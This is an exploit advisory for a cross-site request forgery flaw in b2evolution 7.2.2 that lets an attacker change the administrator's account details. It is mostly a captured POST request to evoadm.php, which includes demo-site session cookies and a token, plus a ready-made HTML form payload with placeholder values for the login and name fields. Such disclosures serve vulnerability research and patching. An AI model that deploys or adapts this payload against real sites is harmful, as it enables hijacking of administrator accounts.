# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel (@alpernae)
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Version : 7.2.2
# Tested on: Kali Linux
# Category: WebApp

######## Description ########

Allows to attacker change admin account details.  

######## Proof of Concept ########

===> REQUEST <==== 

POST /b2evolution/evoadm.php HTTP/1.1
Host: s2.demo.opensourcecms.com
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt; 
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA; 
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1031
Origin: https://s2.demo.opensourcecms.com
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

## < SNIPP > 

edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1




#### Proof-Of-Concept ####

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
      <input type="hidden" name="edited&#95;user&#95;login" value="CHANGEHERE" />
      <input type="hidden" name="edited&#95;user&#95;firstname" value="CHANGEHERE" />
      <input type="hidden" name="edited&#95;user&#95;lastname" value="CHANGEHERE" />
      <input type="hidden" name="edited&#95;user&#95;nickname" value="CHANGEHERE" />
      <input type="hidden" name="edited&#95;user&#95;gender" value="M" />
      <input type="hidden" name="edited&#95;user&#95;ctry&#95;ID" value="233" />
      <input type="hidden" name="edited&#95;user&#95;rgn&#95;ID" value="" />
      <input type="hidden" name="edited&#95;user&#95;subrg&#95;ID" value="" />
      <input type="hidden" name="edited&#95;user&#95;city&#95;ID" value="" />
      <input type="hidden" name="edited&#95;user&#95;age&#95;min" value="" />
      <input type="hidden" name="edited&#95;user&#95;age&#95;max" value="" />
      <input type="hidden" name="edited&#95;user&#95;birthday&#95;month" value="" />
      <input type="hidden" name="edited&#95;user&#95;birthday&#95;day" value="" />
      <input type="hidden" name="edited&#95;user&#95;birthday&#95;year" value="" />
      <input type="hidden" name="organizations&#91;&#93;" value="1" />
      <input type="hidden" name="org&#95;roles&#91;&#93;" value="King&#32;of&#32;Spades" />
      <input type="hidden" name="org&#95;priorities&#91;&#93;" value="" />
      <input type="hidden" name="uf&#95;1" value="I&#32;am&#32;the&#32;demo&#32;administrator&#32;of&#32;this&#32;site&#46;&#13;&#10;I&#32;love&#32;having&#32;so&#32;much&#32;power&#33;" />
      <input type="hidden" name="uf&#95;new&#91;2&#93;&#91;&#93;" value="" />
      <input type="hidden" name="uf&#95;new&#91;3&#93;&#91;&#93;" value="" />
      <input type="hidden" name="uf&#95;2" value="https&#58;&#47;&#47;twitter&#46;com&#47;b2evolution&#47;" />
      <input type="hidden" name="uf&#95;3" value="https&#58;&#47;&#47;www&#46;facebook&#46;com&#47;b2evolution" />
      <input type="hidden" name="uf&#95;4" value="https&#58;&#47;&#47;plus&#46;google&#46;com&#47;&#43;b2evolution&#47;posts" />
      <input type="hidden" name="uf&#95;5" value="https&#58;&#47;&#47;www&#46;linkedin&#46;com&#47;company&#47;b2evolution&#45;net" />
      <input type="hidden" name="uf&#95;6" value="https&#58;&#47;&#47;github&#46;com&#47;b2evolution&#47;b2evolution" />
      <input type="hidden" name="uf&#95;7" value="http&#58;&#47;&#47;b2evolution&#46;net&#47;" />
      <input type="hidden" name="new&#95;field&#95;type" value="0" />
      <input type="hidden" name="actionArray&#91;update&#93;" value="Save&#32;Changes&#33;" />
      <input type="hidden" name="crumb&#95;user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
      <input type="hidden" name="ctrl" value="user" />
      <input type="hidden" name="user&#95;tab" value="profile" />
      <input type="hidden" name="identity&#95;form" value="1" />
      <input type="hidden" name="user&#95;ID" value="1" />
      <input type="hidden" name="orig&#95;user&#95;ID" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>